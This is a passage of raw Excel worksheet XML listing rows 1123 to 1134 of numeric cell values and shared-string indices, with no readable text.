        <v>8455</v>
      </c>
      <c r="AQ1123" t="s">
        <v>8456</v>
      </c>
      <c r="AR1123" t="s">
        <v>8457</v>
      </c>
      <c r="AS1123" t="s">
        <v>71</v>
      </c>
      <c r="AT1123" t="s">
        <v>58</v>
      </c>
      <c r="AU1123">
        <v>0</v>
      </c>
      <c r="AV1123">
        <v>0</v>
      </c>
      <c r="AW1123">
        <v>0</v>
      </c>
      <c r="AX1123">
        <v>0</v>
      </c>
      <c r="AY1123">
        <v>17</v>
      </c>
      <c r="AZ1123">
        <v>12</v>
      </c>
      <c r="BA1123" t="s">
        <v>17652</v>
      </c>
      <c r="BB1123" t="s">
        <v>16125</v>
      </c>
      <c r="BC1123" t="s">
        <v>9550</v>
      </c>
      <c r="BD1123" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="1124" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1124">
        <v>5298</v>
      </c>
      <c r="B1124" t="s">
        <v>8458</v>
      </c>
      <c r="C1124" t="s">
        <v>157</v>
      </c>
      <c r="D1124" t="s">
        <v>8459</v>
      </c>
      <c r="E1124" t="s">
        <v>363</v>
      </c>
      <c r="F1124" t="s">
        <v>364</v>
      </c>
      <c r="G1124" s="1">
        <v>44284</v>
      </c>
      <c r="H1124">
        <v>8742</v>
      </c>
      <c r="I1124">
        <v>8742</v>
      </c>
      <c r="J1124">
        <v>0</v>
      </c>
      <c r="K1124">
        <v>0</v>
      </c>
      <c r="L1124">
        <v>0</v>
      </c>
      <c r="M1124">
        <v>0</v>
      </c>
      <c r="N1124">
        <v>0</v>
      </c>
      <c r="O1124">
        <v>0</v>
      </c>
      <c r="P1124">
        <v>0</v>
      </c>
      <c r="Q1124">
        <v>0</v>
      </c>
      <c r="R1124">
        <v>1</v>
      </c>
      <c r="S1124">
        <v>0</v>
      </c>
      <c r="T1124">
        <v>1</v>
      </c>
      <c r="U1124">
        <v>0</v>
      </c>
      <c r="V1124">
        <v>0</v>
      </c>
      <c r="W1124">
        <v>0</v>
      </c>
      <c r="X1124">
        <v>0</v>
      </c>
      <c r="Y1124">
        <v>0</v>
      </c>
      <c r="Z1124">
        <v>0</v>
      </c>
      <c r="AA1124">
        <v>0</v>
      </c>
      <c r="AB1124">
        <v>0</v>
      </c>
      <c r="AC1124">
        <v>5000</v>
      </c>
      <c r="AD1124">
        <v>0</v>
      </c>
      <c r="AE1124">
        <v>200000</v>
      </c>
      <c r="AF1124" t="s">
        <v>8290</v>
      </c>
      <c r="AG1124">
        <v>61256</v>
      </c>
      <c r="AH1124">
        <v>16</v>
      </c>
      <c r="AJ1124">
        <v>242</v>
      </c>
      <c r="AK1124" t="s">
        <v>758</v>
      </c>
      <c r="AL1124" t="s">
        <v>4212</v>
      </c>
      <c r="AM1124" t="s">
        <v>8460</v>
      </c>
      <c r="AN1124" t="s">
        <v>82</v>
      </c>
      <c r="AO1124">
        <v>2008</v>
      </c>
      <c r="AP1124" t="s">
        <v>4214</v>
      </c>
      <c r="AQ1124" t="s">
        <v>8461</v>
      </c>
      <c r="AR1124" t="s">
        <v>8290</v>
      </c>
      <c r="AS1124" t="s">
        <v>371</v>
      </c>
      <c r="AT1124" t="s">
        <v>86</v>
      </c>
      <c r="AU1124">
        <v>25</v>
      </c>
      <c r="AV1124">
        <v>1</v>
      </c>
      <c r="AW1124">
        <v>15</v>
      </c>
      <c r="AX1124">
        <v>0</v>
      </c>
      <c r="AY1124">
        <v>3</v>
      </c>
      <c r="AZ1124">
        <v>2</v>
      </c>
      <c r="BA1124" t="s">
        <v>17019</v>
      </c>
      <c r="BB1124" t="s">
        <v>16139</v>
      </c>
      <c r="BC1124" t="s">
        <v>12269</v>
      </c>
      <c r="BD1124" t="s">
        <v>13061</v>
      </c>
    </row>
    <row r="1125" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1125">
        <v>5283</v>
      </c>
      <c r="B1125" t="s">
        <v>8462</v>
      </c>
      <c r="C1125" t="s">
        <v>88</v>
      </c>
      <c r="D1125" t="s">
        <v>8463</v>
      </c>
      <c r="E1125" t="s">
        <v>8464</v>
      </c>
      <c r="F1125" t="s">
        <v>8465</v>
      </c>
      <c r="G1125" s="1">
        <v>44322</v>
      </c>
      <c r="H1125">
        <v>8755</v>
      </c>
      <c r="I1125">
        <v>8755</v>
      </c>
      <c r="J1125">
        <v>1</v>
      </c>
      <c r="K1125">
        <v>1</v>
      </c>
      <c r="L1125">
        <v>1</v>
      </c>
      <c r="M1125">
        <v>1</v>
      </c>
      <c r="N1125">
        <v>0</v>
      </c>
      <c r="O1125">
        <v>1</v>
      </c>
      <c r="P1125">
        <v>1</v>
      </c>
      <c r="Q1125">
        <v>2</v>
      </c>
      <c r="R1125">
        <v>1</v>
      </c>
      <c r="S1125">
        <v>1</v>
      </c>
      <c r="T1125">
        <v>1</v>
      </c>
      <c r="U1125">
        <v>0</v>
      </c>
      <c r="V1125">
        <v>0</v>
      </c>
      <c r="W1125">
        <v>0</v>
      </c>
      <c r="X1125">
        <v>0</v>
      </c>
      <c r="Y1125">
        <v>0</v>
      </c>
      <c r="Z1125">
        <v>0</v>
      </c>
      <c r="AA1125">
        <v>0</v>
      </c>
      <c r="AB1125">
        <v>0</v>
      </c>
      <c r="AC1125">
        <v>0</v>
      </c>
      <c r="AD1125">
        <v>0</v>
      </c>
      <c r="AE1125">
        <v>0</v>
      </c>
      <c r="AF1125" t="s">
        <v>8466</v>
      </c>
      <c r="AG1125">
        <v>80117</v>
      </c>
      <c r="AH1125">
        <v>17</v>
      </c>
      <c r="AJ1125">
        <v>282</v>
      </c>
      <c r="AK1125" t="s">
        <v>2842</v>
      </c>
      <c r="AL1125" t="s">
        <v>8467</v>
      </c>
      <c r="AM1125" t="s">
        <v>8468</v>
      </c>
      <c r="AN1125" t="s">
        <v>55</v>
      </c>
      <c r="AO1125">
        <v>1992</v>
      </c>
      <c r="AP1125" t="s">
        <v>8469</v>
      </c>
      <c r="AQ1125" t="s">
        <v>8470</v>
      </c>
      <c r="AR1125" t="s">
        <v>8471</v>
      </c>
      <c r="AS1125" t="s">
        <v>71</v>
      </c>
      <c r="AT1125" t="s">
        <v>58</v>
      </c>
      <c r="AU1125">
        <v>24</v>
      </c>
      <c r="AV1125">
        <v>3</v>
      </c>
      <c r="AW1125">
        <v>0</v>
      </c>
      <c r="AX1125">
        <v>0</v>
      </c>
      <c r="AY1125">
        <v>1</v>
      </c>
      <c r="AZ1125">
        <v>3</v>
      </c>
      <c r="BA1125" t="s">
        <v>17651</v>
      </c>
      <c r="BB1125" t="s">
        <v>16122</v>
      </c>
      <c r="BC1125" t="s">
        <v>10892</v>
      </c>
      <c r="BD1125">
        <v>0</v>
      </c>
    </row>
    <row r="1126" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1126">
        <v>5273</v>
      </c>
      <c r="B1126" t="s">
        <v>8472</v>
      </c>
      <c r="C1126" t="s">
        <v>3013</v>
      </c>
      <c r="D1126" t="s">
        <v>8473</v>
      </c>
      <c r="E1126" t="s">
        <v>944</v>
      </c>
      <c r="F1126" t="s">
        <v>8474</v>
      </c>
      <c r="G1126" s="1">
        <v>44224</v>
      </c>
      <c r="H1126">
        <v>8758</v>
      </c>
      <c r="I1126">
        <v>8758</v>
      </c>
      <c r="J1126">
        <v>0</v>
      </c>
      <c r="K1126">
        <v>0</v>
      </c>
      <c r="L1126">
        <v>0</v>
      </c>
      <c r="M1126">
        <v>1</v>
      </c>
      <c r="N1126">
        <v>0</v>
      </c>
      <c r="O1126">
        <v>0</v>
      </c>
      <c r="P1126">
        <v>0</v>
      </c>
      <c r="Q1126">
        <v>1</v>
      </c>
      <c r="R1126">
        <v>1</v>
      </c>
      <c r="S1126">
        <v>0</v>
      </c>
      <c r="T1126">
        <v>1</v>
      </c>
      <c r="U1126">
        <v>0</v>
      </c>
      <c r="V1126">
        <v>0</v>
      </c>
      <c r="W1126">
        <v>0</v>
      </c>
      <c r="X1126">
        <v>25</v>
      </c>
      <c r="Y1126">
        <v>0</v>
      </c>
      <c r="Z1126">
        <v>0</v>
      </c>
      <c r="AA1126">
        <v>0</v>
      </c>
      <c r="AB1126">
        <v>25</v>
      </c>
      <c r="AC1126">
        <v>25</v>
      </c>
      <c r="AD1126">
        <v>0</v>
      </c>
      <c r="AE1126">
        <v>25</v>
      </c>
      <c r="AF1126" t="s">
        <v>8475</v>
      </c>
      <c r="AG1126">
        <v>28460</v>
      </c>
      <c r="AH1126">
        <v>4</v>
      </c>
      <c r="AJ1126">
        <v>81</v>
      </c>
      <c r="AK1126" t="s">
        <v>8476</v>
      </c>
      <c r="AL1126" t="s">
        <v>8477</v>
      </c>
      <c r="AM1126" t="s">
        <v>8478</v>
      </c>
      <c r="AN1126" t="s">
        <v>68</v>
      </c>
      <c r="AO1126">
        <v>2020</v>
      </c>
      <c r="AP1126">
        <v>82189382622</v>
      </c>
      <c r="AQ1126" t="s">
        <v>8479</v>
      </c>
      <c r="AR1126" t="s">
        <v>8475</v>
      </c>
      <c r="AS1126" t="s">
        <v>71</v>
      </c>
      <c r="AT1126" t="s">
        <v>72</v>
      </c>
      <c r="AU1126">
        <v>6</v>
      </c>
      <c r="AV1126">
        <v>0</v>
      </c>
      <c r="AW1126">
        <v>4</v>
      </c>
      <c r="AX1126">
        <v>4</v>
      </c>
      <c r="AY1126">
        <v>6</v>
      </c>
      <c r="AZ1126">
        <v>6</v>
      </c>
      <c r="BA1126" t="s">
        <v>17645</v>
      </c>
      <c r="BB1126" t="s">
        <v>16126</v>
      </c>
      <c r="BC1126" t="s">
        <v>13054</v>
      </c>
      <c r="BD1126">
        <v>0</v>
      </c>
    </row>
    <row r="1127" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1127">
        <v>5274</v>
      </c>
      <c r="B1127" t="s">
        <v>8480</v>
      </c>
      <c r="C1127" t="s">
        <v>3013</v>
      </c>
      <c r="D1127" t="s">
        <v>8481</v>
      </c>
      <c r="E1127" t="s">
        <v>142</v>
      </c>
      <c r="F1127" t="s">
        <v>8295</v>
      </c>
      <c r="G1127" s="1">
        <v>44225</v>
      </c>
      <c r="H1127">
        <v>8767</v>
      </c>
      <c r="I1127">
        <v>8767</v>
      </c>
      <c r="J1127">
        <v>1</v>
      </c>
      <c r="K1127">
        <v>1</v>
      </c>
      <c r="L1127">
        <v>0</v>
      </c>
      <c r="M1127">
        <v>0</v>
      </c>
      <c r="N1127">
        <v>0</v>
      </c>
      <c r="O1127">
        <v>0</v>
      </c>
      <c r="P1127">
        <v>0</v>
      </c>
      <c r="Q1127">
        <v>1</v>
      </c>
      <c r="R1127">
        <v>1</v>
      </c>
      <c r="S1127">
        <v>0</v>
      </c>
      <c r="T1127">
        <v>0</v>
      </c>
      <c r="U1127">
        <v>5</v>
      </c>
      <c r="V1127">
        <v>5</v>
      </c>
      <c r="W1127">
        <v>0</v>
      </c>
      <c r="X1127">
        <v>0</v>
      </c>
      <c r="Y1127">
        <v>0</v>
      </c>
      <c r="Z1127">
        <v>0</v>
      </c>
      <c r="AA1127">
        <v>0</v>
      </c>
      <c r="AB1127">
        <v>5</v>
      </c>
      <c r="AC1127">
        <v>5</v>
      </c>
      <c r="AD1127">
        <v>0</v>
      </c>
      <c r="AE1127">
        <v>0</v>
      </c>
      <c r="AF1127" t="s">
        <v>8482</v>
      </c>
      <c r="AG1127">
        <v>28453</v>
      </c>
      <c r="AH1127">
        <v>4</v>
      </c>
      <c r="AJ1127">
        <v>81</v>
      </c>
      <c r="AK1127" t="s">
        <v>8483</v>
      </c>
      <c r="AL1127" t="s">
        <v>8484</v>
      </c>
      <c r="AM1127" t="s">
        <v>8485</v>
      </c>
      <c r="AN1127" t="s">
        <v>68</v>
      </c>
      <c r="AO1127">
        <v>2019</v>
      </c>
      <c r="AP1127">
        <v>8127530830</v>
      </c>
      <c r="AQ1127" t="s">
        <v>8486</v>
      </c>
      <c r="AR1127" t="s">
        <v>8482</v>
      </c>
      <c r="AS1127" t="s">
        <v>71</v>
      </c>
      <c r="AT1127" t="s">
        <v>72</v>
      </c>
      <c r="AU1127">
        <v>20</v>
      </c>
      <c r="AV1127">
        <v>20</v>
      </c>
      <c r="AW1127">
        <v>1</v>
      </c>
      <c r="AX1127">
        <v>2</v>
      </c>
      <c r="AY1127">
        <v>2</v>
      </c>
      <c r="AZ1127">
        <v>4</v>
      </c>
      <c r="BA1127" t="s">
        <v>17646</v>
      </c>
      <c r="BB1127" t="s">
        <v>16128</v>
      </c>
      <c r="BC1127" t="s">
        <v>13054</v>
      </c>
      <c r="BD1127">
        <v>0</v>
      </c>
    </row>
    <row r="1128" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1128">
        <v>5275</v>
      </c>
      <c r="B1128" t="s">
        <v>8487</v>
      </c>
      <c r="C1128" t="s">
        <v>3013</v>
      </c>
      <c r="D1128" t="s">
        <v>8488</v>
      </c>
      <c r="E1128" t="s">
        <v>274</v>
      </c>
      <c r="F1128" t="s">
        <v>143</v>
      </c>
      <c r="G1128" s="1">
        <v>44224</v>
      </c>
      <c r="H1128">
        <v>8775</v>
      </c>
      <c r="I1128">
        <v>8775</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t="s">
        <v>8489</v>
      </c>
      <c r="AG1128">
        <v>28463</v>
      </c>
      <c r="AH1128">
        <v>4</v>
      </c>
      <c r="AJ1128">
        <v>81</v>
      </c>
      <c r="AK1128" t="s">
        <v>8490</v>
      </c>
      <c r="AL1128" t="s">
        <v>8491</v>
      </c>
      <c r="AM1128" t="s">
        <v>8492</v>
      </c>
      <c r="AN1128" t="s">
        <v>68</v>
      </c>
      <c r="AO1128">
        <v>2020</v>
      </c>
      <c r="AP1128">
        <v>85263459373</v>
      </c>
      <c r="AQ1128" t="s">
        <v>8493</v>
      </c>
      <c r="AR1128" t="s">
        <v>8489</v>
      </c>
      <c r="AS1128" t="s">
        <v>71</v>
      </c>
      <c r="AT1128" t="s">
        <v>72</v>
      </c>
      <c r="AU1128">
        <v>6</v>
      </c>
      <c r="AV1128">
        <v>5</v>
      </c>
      <c r="AW1128">
        <v>0</v>
      </c>
      <c r="AX1128">
        <v>0</v>
      </c>
      <c r="AY1128">
        <v>2</v>
      </c>
      <c r="AZ1128">
        <v>4</v>
      </c>
      <c r="BA1128" t="s">
        <v>17647</v>
      </c>
      <c r="BB1128" t="s">
        <v>16129</v>
      </c>
      <c r="BC1128" t="s">
        <v>13057</v>
      </c>
      <c r="BD1128">
        <v>0</v>
      </c>
    </row>
    <row r="1129" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1129">
        <v>5272</v>
      </c>
      <c r="B1129" t="s">
        <v>8494</v>
      </c>
      <c r="C1129" t="s">
        <v>3013</v>
      </c>
      <c r="D1129" t="s">
        <v>8495</v>
      </c>
      <c r="E1129" t="s">
        <v>49</v>
      </c>
      <c r="F1129" t="s">
        <v>8496</v>
      </c>
      <c r="G1129" s="1">
        <v>44224</v>
      </c>
      <c r="H1129">
        <v>8783</v>
      </c>
      <c r="I1129">
        <v>8783</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t="s">
        <v>8497</v>
      </c>
      <c r="AG1129">
        <v>28463</v>
      </c>
      <c r="AH1129">
        <v>4</v>
      </c>
      <c r="AJ1129">
        <v>81</v>
      </c>
      <c r="AK1129" t="s">
        <v>8490</v>
      </c>
      <c r="AL1129" t="s">
        <v>8491</v>
      </c>
      <c r="AM1129" t="s">
        <v>8498</v>
      </c>
      <c r="AN1129" t="s">
        <v>68</v>
      </c>
      <c r="AO1129">
        <v>2021</v>
      </c>
      <c r="AP1129">
        <v>85215705287</v>
      </c>
      <c r="AQ1129" t="s">
        <v>8499</v>
      </c>
      <c r="AR1129" t="s">
        <v>8497</v>
      </c>
      <c r="AS1129" t="s">
        <v>71</v>
      </c>
      <c r="AT1129" t="s">
        <v>72</v>
      </c>
      <c r="AU1129">
        <v>6</v>
      </c>
      <c r="AV1129">
        <v>5</v>
      </c>
      <c r="AW1129">
        <v>1</v>
      </c>
      <c r="AX1129">
        <v>3</v>
      </c>
      <c r="AY1129">
        <v>2</v>
      </c>
      <c r="AZ1129">
        <v>3</v>
      </c>
      <c r="BA1129" t="s">
        <v>17644</v>
      </c>
      <c r="BB1129" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1129" t="s">
        <v>13057</v>
      </c>
      <c r="BD1129">
        <v>0</v>
      </c>
    </row>
    <row r="1130" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1130">
        <v>5249</v>
      </c>
      <c r="B1130" t="s">
        <v>8500</v>
      </c>
      <c r="C1130" t="s">
        <v>157</v>
      </c>
      <c r="D1130" t="s">
        <v>8501</v>
      </c>
      <c r="E1130" t="s">
        <v>363</v>
      </c>
      <c r="F1130" t="s">
        <v>364</v>
      </c>
      <c r="G1130" s="1">
        <v>44238</v>
      </c>
      <c r="H1130">
        <v>8791</v>
      </c>
      <c r="I1130">
        <v>8791</v>
      </c>
      <c r="J1130">
        <v>0</v>
      </c>
      <c r="K1130">
        <v>0</v>
      </c>
      <c r="L1130">
        <v>0</v>
      </c>
      <c r="M1130">
        <v>0</v>
      </c>
      <c r="N1130">
        <v>0</v>
      </c>
      <c r="O1130">
        <v>0</v>
      </c>
      <c r="P1130">
        <v>0</v>
      </c>
      <c r="Q1130">
        <v>0</v>
      </c>
      <c r="R1130">
        <v>0</v>
      </c>
      <c r="S1130">
        <v>0</v>
      </c>
      <c r="T1130">
        <v>2</v>
      </c>
      <c r="U1130">
        <v>0</v>
      </c>
      <c r="V1130">
        <v>0</v>
      </c>
      <c r="W1130">
        <v>0</v>
      </c>
      <c r="X1130">
        <v>0</v>
      </c>
      <c r="Y1130">
        <v>0</v>
      </c>
      <c r="Z1130">
        <v>0</v>
      </c>
      <c r="AA1130">
        <v>0</v>
      </c>
      <c r="AB1130">
        <v>0</v>
      </c>
      <c r="AC1130">
        <v>0</v>
      </c>
      <c r="AD1130">
        <v>0</v>
      </c>
      <c r="AE1130">
        <v>1500000</v>
      </c>
      <c r="AF1130" t="s">
        <v>8502</v>
      </c>
      <c r="AG1130">
        <v>60182</v>
      </c>
      <c r="AH1130">
        <v>16</v>
      </c>
      <c r="AJ1130">
        <v>264</v>
      </c>
      <c r="AK1130" t="s">
        <v>211</v>
      </c>
      <c r="AL1130" t="s">
        <v>2882</v>
      </c>
      <c r="AM1130" t="s">
        <v>8503</v>
      </c>
      <c r="AN1130" t="s">
        <v>55</v>
      </c>
      <c r="AO1130">
        <v>2020</v>
      </c>
      <c r="AP1130">
        <v>82233031235</v>
      </c>
      <c r="AQ1130" t="s">
        <v>8504</v>
      </c>
      <c r="AR1130" t="s">
        <v>8505</v>
      </c>
      <c r="AS1130" t="s">
        <v>371</v>
      </c>
      <c r="AT1130" t="s">
        <v>58</v>
      </c>
      <c r="AU1130">
        <v>6</v>
      </c>
      <c r="AV1130">
        <v>1</v>
      </c>
      <c r="AW1130">
        <v>12</v>
      </c>
      <c r="AX1130">
        <v>0</v>
      </c>
      <c r="AY1130">
        <v>2</v>
      </c>
      <c r="AZ1130">
        <v>2</v>
      </c>
      <c r="BA1130" t="s">
        <v>16803</v>
      </c>
      <c r="BB1130">
        <v>0</v>
      </c>
      <c r="BC1130">
        <v>0</v>
      </c>
      <c r="BD1130" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="1131" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1131">
        <v>5296</v>
      </c>
      <c r="B1131" t="s">
        <v>8506</v>
      </c>
      <c r="C1131" t="s">
        <v>74</v>
      </c>
      <c r="D1131" t="s">
        <v>8507</v>
      </c>
      <c r="E1131" t="s">
        <v>142</v>
      </c>
      <c r="F1131" t="s">
        <v>8508</v>
      </c>
      <c r="G1131" s="1">
        <v>44280</v>
      </c>
      <c r="H1131">
        <v>8813</v>
      </c>
      <c r="I1131">
        <v>8813</v>
      </c>
      <c r="J1131">
        <v>2</v>
      </c>
      <c r="K1131">
        <v>0</v>
      </c>
      <c r="L1131">
        <v>1</v>
      </c>
      <c r="M1131">
        <v>0</v>
      </c>
      <c r="N1131">
        <v>0</v>
      </c>
      <c r="O1131">
        <v>0</v>
      </c>
      <c r="P1131">
        <v>0</v>
      </c>
      <c r="Q1131">
        <v>0</v>
      </c>
      <c r="R1131">
        <v>0</v>
      </c>
      <c r="S1131">
        <v>0</v>
      </c>
      <c r="T1131">
        <v>1</v>
      </c>
      <c r="U1131">
        <v>125000</v>
      </c>
      <c r="V1131">
        <v>0</v>
      </c>
      <c r="W1131">
        <v>2000</v>
      </c>
      <c r="X1131">
        <v>0</v>
      </c>
      <c r="Y1131">
        <v>0</v>
      </c>
      <c r="Z1131">
        <v>0</v>
      </c>
      <c r="AA1131">
        <v>0</v>
      </c>
      <c r="AB1131">
        <v>0</v>
      </c>
      <c r="AC1131">
        <v>0</v>
      </c>
      <c r="AD1131">
        <v>0</v>
      </c>
      <c r="AE1131">
        <v>500</v>
      </c>
      <c r="AF1131" t="s">
        <v>8509</v>
      </c>
      <c r="AG1131">
        <v>50145</v>
      </c>
      <c r="AH1131">
        <v>14</v>
      </c>
      <c r="AJ1131">
        <v>220</v>
      </c>
      <c r="AK1131" t="s">
        <v>8232</v>
      </c>
      <c r="AL1131" t="s">
        <v>8510</v>
      </c>
      <c r="AM1131" t="s">
        <v>8511</v>
      </c>
      <c r="AN1131" t="s">
        <v>68</v>
      </c>
      <c r="AO1131">
        <v>2016</v>
      </c>
      <c r="AP1131" t="s">
        <v>8512</v>
      </c>
      <c r="AQ1131" t="s">
        <v>8513</v>
      </c>
      <c r="AR1131" t="s">
        <v>8514</v>
      </c>
      <c r="AS1131" t="s">
        <v>71</v>
      </c>
      <c r="AT1131" t="s">
        <v>72</v>
      </c>
      <c r="AU1131">
        <v>24</v>
      </c>
      <c r="AV1131">
        <v>1</v>
      </c>
      <c r="AW1131">
        <v>4</v>
      </c>
      <c r="AX1131">
        <v>0</v>
      </c>
      <c r="AY1131">
        <v>7</v>
      </c>
      <c r="AZ1131">
        <v>5</v>
      </c>
      <c r="BA1131" t="s">
        <v>17655</v>
      </c>
      <c r="BB1131">
        <v>0</v>
      </c>
      <c r="BC1131" t="s">
        <v>13069</v>
      </c>
      <c r="BD1131">
        <v>0</v>
      </c>
    </row>
    <row r="1132" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1132">
        <v>5276</v>
      </c>
      <c r="B1132" t="s">
        <v>8515</v>
      </c>
      <c r="C1132" t="s">
        <v>3013</v>
      </c>
      <c r="D1132" t="s">
        <v>8516</v>
      </c>
      <c r="E1132" t="s">
        <v>8517</v>
      </c>
      <c r="F1132" t="s">
        <v>8518</v>
      </c>
      <c r="G1132" s="1">
        <v>44225</v>
      </c>
      <c r="H1132">
        <v>8837</v>
      </c>
      <c r="I1132">
        <v>8837</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t="s">
        <v>8519</v>
      </c>
      <c r="AG1132">
        <v>28453</v>
      </c>
      <c r="AH1132">
        <v>4</v>
      </c>
      <c r="AJ1132">
        <v>81</v>
      </c>
      <c r="AK1132" t="s">
        <v>8483</v>
      </c>
      <c r="AL1132" t="s">
        <v>8520</v>
      </c>
      <c r="AM1132" t="s">
        <v>8521</v>
      </c>
      <c r="AN1132" t="s">
        <v>68</v>
      </c>
      <c r="AO1132">
        <v>2018</v>
      </c>
      <c r="AP1132">
        <v>85278554133</v>
      </c>
      <c r="AQ1132" t="s">
        <v>8522</v>
      </c>
      <c r="AR1132" t="s">
        <v>8519</v>
      </c>
      <c r="AS1132" t="s">
        <v>71</v>
      </c>
      <c r="AT1132" t="s">
        <v>72</v>
      </c>
      <c r="AU1132">
        <v>3</v>
      </c>
      <c r="AV1132">
        <v>5</v>
      </c>
      <c r="AW1132">
        <v>2</v>
      </c>
      <c r="AX1132">
        <v>1</v>
      </c>
      <c r="AY1132">
        <v>1</v>
      </c>
      <c r="AZ1132">
        <v>1</v>
      </c>
      <c r="BA1132" t="s">
        <v>17648</v>
      </c>
      <c r="BB1132" t="s">
        <v>16130</v>
      </c>
      <c r="BC1132" t="s">
        <v>13057</v>
      </c>
      <c r="BD1132">
        <v>0</v>
      </c>
    </row>
    <row r="1133" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1133">
        <v>5124</v>
      </c>
      <c r="B1133" t="s">
        <v>8523</v>
      </c>
      <c r="C1133" t="s">
        <v>2308</v>
      </c>
      <c r="D1133" t="s">
        <v>8524</v>
      </c>
      <c r="E1133" t="s">
        <v>843</v>
      </c>
      <c r="F1133" t="s">
        <v>1368</v>
      </c>
      <c r="G1133" s="1">
        <v>44242</v>
      </c>
      <c r="H1133">
        <v>8888</v>
      </c>
      <c r="I1133">
        <v>8888</v>
      </c>
      <c r="J1133">
        <v>0</v>
      </c>
      <c r="K1133">
        <v>0</v>
      </c>
      <c r="L1133">
        <v>0</v>
      </c>
      <c r="M1133">
        <v>0</v>
      </c>
      <c r="N1133">
        <v>0</v>
      </c>
      <c r="O1133">
        <v>0</v>
      </c>
      <c r="P1133">
        <v>0</v>
      </c>
      <c r="Q1133">
        <v>3</v>
      </c>
      <c r="R1133">
        <v>4</v>
      </c>
      <c r="S1133">
        <v>0</v>
      </c>
      <c r="T1133">
        <v>1</v>
      </c>
      <c r="U1133">
        <v>0</v>
      </c>
      <c r="V1133">
        <v>0</v>
      </c>
      <c r="W1133">
        <v>0</v>
      </c>
      <c r="X1133">
        <v>0</v>
      </c>
      <c r="Y1133">
        <v>0</v>
      </c>
      <c r="Z1133">
        <v>0</v>
      </c>
      <c r="AA1133">
        <v>0</v>
      </c>
      <c r="AB1133">
        <v>500</v>
      </c>
      <c r="AC1133">
        <v>2000</v>
      </c>
      <c r="AD1133">
        <v>0</v>
      </c>
      <c r="AE1133">
        <v>5000</v>
      </c>
      <c r="AF1133" t="s">
        <v>8525</v>
      </c>
      <c r="AG1133">
        <v>98412</v>
      </c>
      <c r="AH1133">
        <v>33</v>
      </c>
      <c r="AJ1133">
        <v>485</v>
      </c>
      <c r="AK1133" t="s">
        <v>8526</v>
      </c>
      <c r="AL1133" t="s">
        <v>8527</v>
      </c>
      <c r="AM1133" t="s">
        <v>8528</v>
      </c>
      <c r="AN1133" t="s">
        <v>55</v>
      </c>
      <c r="AO1133">
        <v>2020</v>
      </c>
      <c r="AP1133">
        <v>8114131302</v>
      </c>
      <c r="AQ1133" t="s">
        <v>8529</v>
      </c>
      <c r="AR1133" t="s">
        <v>8530</v>
      </c>
      <c r="AS1133" t="s">
        <v>71</v>
      </c>
      <c r="AT1133" t="s">
        <v>58</v>
      </c>
      <c r="AU1133">
        <v>20</v>
      </c>
      <c r="AV1133">
        <v>1</v>
      </c>
      <c r="AW1133">
        <v>0</v>
      </c>
      <c r="AX1133">
        <v>0</v>
      </c>
      <c r="AY1133">
        <v>4</v>
      </c>
      <c r="AZ1133">
        <v>1</v>
      </c>
      <c r="BA1133" t="s">
        <v>17598</v>
      </c>
      <c r="BB1133" t="s">
        <v>17660</v>
      </c>
      <c r="BC1133" t="s">
        <v>12411</v>
      </c>
      <c r="BD1133" t="s">
        <v>13094</v>
      </c>
    </row>
    <row r="1134" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1134">
        <v>5247</v>
      </c>
      <c r="B1134" t="s">
        <v>8531</v>
      </c>
      <c r="C1134" t="s">
        <v>168</v>
      </c>
      <c r="D1134" t="s">
        <v>8532</v>
      </c>
      <c r="E1134" t="s">
        <v>1346</v>
      </c>
      <c r="F1134" t="s">
        <v>8533</v>
      </c>
      <c r="G1134" s="1">
        <v>44258</v>
      </c>
      <c r="H1134">
        <v>8894</v>
      </c>
      <c r="I1134">
        <v>8894</v>
      </c>
      <c r="J1134">
        <v>4</v>
      </c>
      <c r="K1134">
        <v>1</v>
      </c>
      <c r="L1134">
        <v>3</v>
      </c>
      <c r="M1134">
        <v>0</v>
      </c>
      <c r="N1134">
        <v>0</v>
      </c>
      <c r="O1134">
        <v>0</v>
      </c>
      <c r="P1134">
        <v>3</v>
      </c>
      <c r="Q1134">
        <v>10</v>
      </c>
      <c r="R1134">
        <v>4</v>
      </c>
      <c r="S1134">
        <v>1</v>
      </c>
      <c r="T1134">
        <v>1</v>
      </c>
      <c r="U1134">
        <v>40000</v>
      </c>
      <c r="V1134">
        <v>1</v>
      </c>
      <c r="W1134">
        <v>10000</v>
      </c>
      <c r="X1134">
        <v>0</v>
      </c>
      <c r="Y1134">
        <v>0</v>
      </c>
      <c r="Z1134">
        <v>0</v>
      </c>
      <c r="AA1134">
        <v>1000</v>
      </c>
      <c r="AB1134">
        <v>10000</v>
      </c>
      <c r="AC1134">
        <v>10000</v>
      </c>
      <c r="AD1134">
        <v>1</v>
      </c>
      <c r="AE1134">
        <v>20000</v>
      </c>
      <c r="AF1134" t="s">
        <v>8534</v>
      </c>
      <c r="AG1134">
        <v>45181</v>
      </c>
      <c r="AH1134">
        <v>13</v>
      </c>
      <c r="AJ1134">
        <v>169</v>
      </c>
      <c r="AK1134" t="s">
        <v>5936</v>
      </c>
      <c r="AL1134" t="s">
        <v>5937</v>
      </c>
      <c r="AM1134" t="s">
        <v>8535</v>
      </c>
      <c r="AN1134" t="s">
        <v>55</v>
      </c>
      <c r="AO1134">
        <v>2018</v>
      </c>
      <c r="AP1134">
        <v>2318512294</v>
      </c>
      <c r="AQ1134" t="s">
        <v>5939</v>
      </c>
      <c r="AR1134" t="s">
        <v>5940</v>
      </c>
      <c r="AS1134" t="s">
        <v>71</v>
      </c>
      <c r="AT1134" t="s">
        <v>58</v>
      </c>
      <c r="AU1134">
        <v>26</v>
      </c>
      <c r="AV1134">
        <v>1</v>
      </c>
      <c r="AW1134">
        <v>114</v>
      </c>
      <c r="AX1134">
        <v>153</v>
      </c>
      <c r="AY1134">
        <v>27</v>
      </c>
      <c r="AZ1134">
        <v>110</v>
      </c>
      <c r="BA1134" t="s">
